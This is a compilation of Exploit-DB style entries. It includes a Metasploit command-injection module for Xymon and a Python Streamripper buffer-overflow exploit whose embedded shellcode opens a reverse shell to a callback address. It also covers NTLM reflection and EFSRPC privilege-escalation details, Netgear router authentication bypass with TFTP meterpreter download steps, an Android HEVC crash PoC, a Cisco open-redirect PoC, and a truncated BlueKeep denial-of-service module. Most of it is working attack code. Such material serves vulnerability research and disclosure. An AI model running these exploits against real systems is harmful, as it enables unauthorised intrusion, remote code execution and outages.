-
Xymon 4.3.25 - useradm Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Xymon useradm.sh command injection (CVE-2016-2056).
#
# useradm.sh hands the "new user" form fields to htpasswd through system();
# a crafted USERNAME therefore runs as the web server user. Valid Xymon
# credentials for the secure CGI directory are required (HTTP basic auth).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xymon useradm Command Execution',
      'Description'    => %q{
        This module exploits a command injection vulnerability in Xymon
        versions before 4.3.25 which allows authenticated users to execute
        arbitrary operating system commands as the web server user.

        When adding a new user to the system via the web interface with
        `useradm.sh`, the user's username and password are passed to
        `htpasswd` in a call to `system()` without validation.

        This module has been tested successfully on Xymon version 4.3.10
        on Debian 6.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Markus Krell', # Discovery
        'bcoles'        # Metasploit
      ],
      'References'     => [
        ['CVE', '2016-2056'],
        ['PACKETSTORM', '135758'],
        ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
        ['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'],
        ['URL', 'https://sourceforge.net/p/xymon/code/7892/'],
        ['URL', 'https://www.debian.org/security/2016/dsa-3495']
      ],
      'DisclosureDate' => '2016-02-14',
      'Platform'       => %w(unix linux solaris bsd),
      'Targets'        => [
        [
          'Unix CMD',
          {
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'Payload' => {
              'Space' => 2048,
              'BadChars' => "\x00\x0A\x0D",
              'DisableNops' => true,
              'Compat' => {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'generic perl python netcat php'
              }
            }
          }
        ],
        [
          'Linux',
          {
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64]
          }
        ],
        [
          'Solaris',
          {
            'Platform' => 'solaris',
            'Arch' => [ARCH_X86]
          }
        ],
        [
          'BSD',
          {
            'Platform' => 'bsd',
            'Arch' => [ARCH_X86, ARCH_X64]
          }
        ]
      ],
      'Privileged'     => false,
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [ true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/' ]),
      OptString.new('USERNAME', [true, 'The username for Xymon']),
      OptString.new('PASSWORD', [true, 'The password for Xymon'])
    ])
  end

  # Basic-auth username taken from the datastore.
  def user
    datastore['USERNAME']
  end

  # Basic-auth password taken from the datastore.
  def pass
    datastore['PASSWORD']
  end

  # Fetch useradm.sh with the configured credentials and grade the target.
  #
  # Returns a CheckCode:
  #   Unknown  - no reply at all, or the credentials were rejected (401);
  #              nothing can be said about the version in that case.
  #   Safe     - useradm.sh is missing (404), the page is not a Xymon page,
  #              or the advertised version is 4.3.25 or later.
  #   Detected - a Xymon page with no parseable version string.
  #   Appears  - a Xymon version string below 4.3.25.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
      'authorization' => basic_auth(user, pass)
    )

    unless res
      vnote('Connection failed')
      return CheckCode::Unknown
    end

    case res.code
    when 401
      vnote('Authentication failed')
      return CheckCode::Unknown
    when 404
      vnote('useradm.sh not found')
      return CheckCode::Safe
    end

    unless res.body.include?('Xymon')
      vnote('Target is not a Xymon server.')
      return CheckCode::Safe
    end

    # First ">Xymon x.y.z<" fragment in the page footer/header.
    version = res.body[/>Xymon ([\d\.]+)</, 1]

    unless version
      vnote('Could not determine Xymon version')
      return CheckCode::Detected
    end

    vnote("Xymon version #{version}")

    patched = Gem::Version.new(version) >= Gem::Version.new('4.3.25')
    patched ? CheckCode::Safe : CheckCode::Appears
  end

  # Submit the "create user" form with +cmd+ injected into USERNAME.
  #
  # The USERNAME value closes the single-quoted htpasswd argument, runs +cmd+
  # in the background (so the CGI returns instead of blocking on a long
  # lived payload) and re-opens a quote so the rest of the shell line stays
  # well-formed. The request is given a short timeout because the payload
  # is expected to outlive it. HTTP 500 is treated as success - presumably
  # because the mangled htpasswd invocation fails after the injected command
  # has already been launched.
  #
  # Returns the response, or nil once a session has been established.
  # Raises via fail_with on no reply, 401, or any status other than 500.
  def execute_command(cmd, opts = {})
    form = {
      'USERNAME' => "';#{cmd} & echo '",
      'PASSWORD' => '',
      'SendCreate' => 'Create'
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
      'method' => 'POST',
      'authorization' => basic_auth(user, pass),
      # Field order is shuffled on every request.
      'vars_post' => Hash[form.to_a.shuffle]
    }, 5)

    return if session_created?

    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::NoAccess, 'Authentication failed') if res.code == 401
    fail_with(Failure::Unknown, 'Unexpected reply') unless res.code == 500

    print_good "#{peer} - Payload sent successfully"
    res
  end

  # Run check first, then deliver either the raw command payload or a
  # staged native payload through the command stager.
  def exploit
    acceptable = [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears]
    unless acceptable.include?(check)
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if payload.arch.first == 'cmd'
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1_500)
    end
  end

  private

  # Verbose status line prefixed with the peer, as the rest of the module logs.
  def vnote(msg)
    vprint_status "#{peer} - #{msg}"
  end
end
-
Streamripper 2.6 - 'Song Pattern' Buffer Overflow
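#!/usr/bin/python
#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
#Version: 2.6
#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"

# All payload pieces are bytes literals so the script produces the same
# exploit.txt under Python 2 and Python 3 (the original wrote str objects
# to a file opened in 'wb' mode, which raises TypeError on Python 3).

#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
# NOTE: this is the author's alpha_mixed-encoded reverse shell calling back to
# 192.168.56.6:4444. Regenerate it for your own listener before use.
shellcode = (
    b"\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
    b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
    b"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30"
    b"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b"
    b"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42"
    b"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a"
    b"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c"
    b"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f"
    b"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67"
    b"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71"
    b"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54"
    b"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58"
    b"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c"
    b"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61"
    b"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d"
    b"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43"
    b"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52"
    b"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56"
    b"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51"
    b"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69"
    b"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49"
    b"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a"
    b"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73"
    b"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62"
    b"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77"
    b"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30"
    b"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50"
    b"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30"
    b"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a"
    b"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77"
    b"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32"
    b"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50"
    b"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51"
    b"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70"
    b"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66"
    b"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46"
    b"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d"
    b"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74"
    b"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e"
    b"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c"
    b"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e"
    b"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47"
    b"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d"
    b"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d"
    b"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30"
    b"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73"
    b"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55"
    b"\x41\x41"
)

#74302E3F comctl32.DLL
# Saved return address, little-endian. The original author chose this
# address inside comctl32.DLL (see the comment above); it is specific to
# the tested Win7 SP1 x64 build and must be re-found for other systems.
RET = b"\x3f\x2e\x30\x74"
FILLER = 256      # bytes of junk before the saved return address
NOP_SLED = 10     # NOPs between the return address and the shellcode
INTENDED = 260    # total length the original arithmetic was written against

# The original trailer was "C" * (260 - 256 - 4 - 10), i.e. "C" * -10, which
# Python evaluates to an empty string. max(0, ...) keeps that no-op explicit
# instead of relying on negative string repetition.
tail = b"C" * max(0, INTENDED - FILLER - len(RET) - NOP_SLED)

buffer = b"A" * FILLER + RET + b"\x90" * NOP_SLED + shellcode + tail

# Context manager closes the file even if the write fails.
with open('exploit.txt', 'wb') as f:
    f.write(buffer)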
-
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation
VULNERABILITY DETAILS It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues mentioned below with a bug in Chromium to escape its sandbox. ## HTTP -> SMB NTLM reflection This is a long-known attack that was described, for example, in https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was supposed to fix it by blocking attempts to reflect NTLM authentication operating in the same-machine mode (not sure about the actual internal term for that). However, it's still possible to reflect NTLM authentication that works in the regular remote mode, and an attacker can force the parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED flag in the initial NEGOTIATE_MESSAGE message. In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client, and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM authentication request and considers the `localhost` domain to be safe to automatically log on with the current user's credentials. The sandboxed process forwards the corresponding packets to the local SMB server. The problem here is that since the established session is considered remotely authenticated, it's not allowed to access administrative shares unless the browser process runs at the high integrity level. Therefore, another bug is required to gain file system access. ## Insufficient path check in EFSRPC The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to manage data objects stored in an encrypted form. It supports backing up and restoring files over SMB, among other things. Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they forbid remote users from passing regular (local) file paths.
However, if the attacker passes a UNC path of the form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the calling user, but this time using the same machine mode authentication; therefore it will be permitted to access the C$ share. The exploit saves the payload on the user's disk (the easiest way might be just to force it to be auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the user's Startup folder. There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw` accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it starts with two back-slashes. Please note that this variant also works in the case where a regular user's credentials are relayed to another machine in a domain, so it might have wider security implications. It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the same RPC endpoint is available on the `lsass` named pipe with UUID [c681d488-d850-11d0-8c52-00c04fd90f7e]. REPRODUCTION CASE The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a collection of Python classes that supports working with SMB and MSRPC. 1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server. 2. Open http://localhost/ in a Chromium-based browser. 3. You should see a new .exe file appearing on your desktop. VERSION Microsoft Windows [Version 10.0.17134.648] REFERENCES https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47115.zip
-
Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass
# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (enter the SSSSSSSNNNNNN serial number obtained above as the input value) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (only one attempt is allowed, because of /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat the recovery process with these answers to obtain the admin password) == Authenticated Telnet Command Execution == >> http://admin:[ADMIN-PASSWORD]@192.168.1.1/setup.cgi?todo=debug (the credentials in this URL were mangled by e-mail obfuscation in the original listing; use the admin password recovered above) :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } # Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: JWNR2010v5 # Firmware Version: 1.1.0.54 # Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx # Firmware Link: 
http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip # Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5" == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.1.0.54 Model=JWNR2010v5 >> http://192.168.1.1/BRS_netgear_success.html (Serial Number) setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000); == Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") == >> http://192.168.1.1/401_recovery.htm (enter the SSSSSSSNNNNNN serial number obtained above as the input value) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (only one attempt is allowed, because of /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="htpwd_answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="htpwd_answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat the recovery process with these answers to obtain the admin password) == Authenticated Telnet Command Execution == >> http://admin:[ADMIN-PASSWORD]@192.168.1.1/setup.cgi?todo=debug (the credentials in this URL were mangled by e-mail obfuscation in the original listing; use the admin password recovered above) :~$ telnet 192.168.1.1 JWNR2010v5 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] }
-
Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write
CVE-2019-2107 - looks scary. Still remember the Stagefright and PNG vulnerabilities .... With CVE-2019-2107 the decoder/codec runs under the mediacodec user, and with a properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly get RCE. The codec affected is HEVC (a.k.a. H.265 / MPEG-H Part 2) #exploit #rce #android #stagefright #cve More info LineageOS (Android): 02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08 02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. 02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5. 02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths. mplayer (laptop) id: 0 [hevc @ 0x7f0bf58a7560]Decoding VPS [hevc @ 0x7f0bf58a7560]Main profile bitstream [hevc @ 0x7f0bf58a7560]Decoding SPS [hevc @ 0x7f0bf58a7560]Main profile bitstream [hevc @ 0x7f0bf58a7560]Decoding VUI [hevc @ 0x7f0bf58a7560]Decoding PPS [hevc @ 0x7f0bf58a7560]Invalid tile widths. [hevc @ 0x7f0bf58a7560]Decoding SEI [hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5 [hevc @ 0x7f0bf58a7560]PPS id out of range: 0 [hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5. Error while decoding frame! This is what stops it in FFmpeg when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526 So in FFmpeg the check is there. On stock/Google Android I think the VideoPlayer will use libhevc, not FFmpeg. https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/ I have the Google codec: OMX.google.hevc.decoder I am wondering, however, why it does not crash .... 
Attaching the video (videopoc.mp4) that should trigger this condition (the added check from the fix): if (value >= ps_sps->i2_pic_wd_in_ctb - start) + { + return IHEVCD_INVALID_HEADER; + } Maybe somebody will have more luck. More info 2 Whoooo hooo .... made it :) The proof of concept is hevc-crash-poc.mp4; the other videos are for non-Android players. HEVC-"fright" is possible: with a real payload, viewing a crafted video could compromise the phone. My example does not include a real payload; the tombstone below only shows the resulting crash (SIGSEGV in the mediaextractor process), not code execution. 07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089 07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys' 07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9' 07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64' 07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<< 07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050 07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001 07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04 07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0 07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001 07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020 07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006 07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001 07-13 21:50:59.010 24089 24089 F 
DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438 07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000 07-13 21:50:59.013 24089 24089 F DEBUG : -- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47119.zip
-
CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities
# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities. # Shodan query: /config/log_off_page.html # Discovered Date: 07/03/2014 # Reported Date: 08/04/2019 # Exploit Author: Ramikan # Website: http://fact-in-hack.blogspot.com # Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html # Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled, # Tested On: Cisco C300 Switch # Version: 1.3.7.18 # CVE : CVE-2019-1943 # CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N) # Category:Hardware, Web Apps # Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect ************************************************************************************************************************************* Vulnerability 1: Information Gathering ************************************************************************************************************************************* Unauthenticated user can find the version number and device type by visiting this link directly. Affected URL: /cs703dae2c/device/English/dictionaryLogin.xml ************************************************************************************************************************************* Vulnerability 2: Open Redirect due to host header. ************************************************************************************************************************************* Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting. 
Normal Request GET / HTTP/1.1 Host: 10.1.1.120 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Connection: close Cache-Control: max-age=0 Normal Response HTTP/1.1 302 Redirect Server: GoAhead-Webs Date: Fri Mar 07 09:40:22 2014 Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: https://10.21.151.120/cs703dae2c/ <html><head></head><body> This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>. Please update your documents to reflect the new location. </body></html> ************************************************************************************************************************************* POC ************************************************************************************************************************************* Host Header changed to different domain (example google.com). Request: GET /cs703dae2c HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: activeLangId=English; isStackableDevice=false Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Redirect activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs Date: Fri Mar 07 09:45:26 2014 Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://google.com/cs703dae2c/config/log_off_page.htm <html><head></head><body> This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>. Please update your documents to reflect the new location. </body></html> The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. 
The attacker needs to be on the same network and must be able to modify the victim's request on the wire (i.e. rewrite the Host header) in order to trigger this vulnerability. ************************************************************************************************************************************* Attack Vector: ************************************************************************************************************************************* Can be used for domain fronting. curl -k --header "Host: attack.host.net" "domainname of the cisco device" ************************************************************************************************************************************* Vendor Response: ************************************************************************************************************************************* Issue 1: Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so we will treat it as a hardening enhancement. Issue 2: The developers won't be able to provide a fix for this in the short term (90 days), so we are planning to disclose this issue through an advisory on July 17th 2019. We have assigned CVE-2019-1943 to this issue. Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect *************************************************************************************************************************************
-
Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)
# Exploit Title: Bluekeep Denial of Service (metasploit module)
# Shodan Dork: port:3389
# Date: 07/14/2019
# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
# Vendor Homepage: https://microsoft.com
# Version: all affected RDP services by cve-2019-0708
# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
# CVE : 2019-0708

# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
#
# NOTE(review): 'Stability' below is CRASH_OS_DOWN. A successful run does not
# merely "check" a host, it crashes it (bugcheck). Only point this at systems
# you are explicitly authorised to take down.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  Rank = NormalRanking

  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::Tcp

  ## Module metadata and options. The RDP_CLIENT_IP / RDP_CLIENT_NAME /
  ## RDP_DOMAIN / RDP_USER values are only reported to the server during the
  ## connection sequence; they do not need to be real.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
      'Description'    => %q{
        This module checks a range of hosts for the CVE-2019-0708 vulnerability
        by binding the MS_T120 channel outside of its normal slot and sending
        DoS packets.
      },
      'Author' => [
        'National Cyber Security Centre', # Discovery
        'JaGoTu',                         # Module
        'zerosum0x0',                     # Module
        'Tom Sellers',                    # TLS support and documented packets
        'RAMELLA Sebastien'               # Denial of service module
      ],
      'References' => [
        [ 'CVE', '2019-0708' ],
        [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
      ],
      'DisclosureDate' => '2019-05-14',
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [ CRASH_OS_DOWN ],
        'AKA' => ['BlueKeep']
      }
    ))

    register_options(
      [
        OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
        OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
        OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
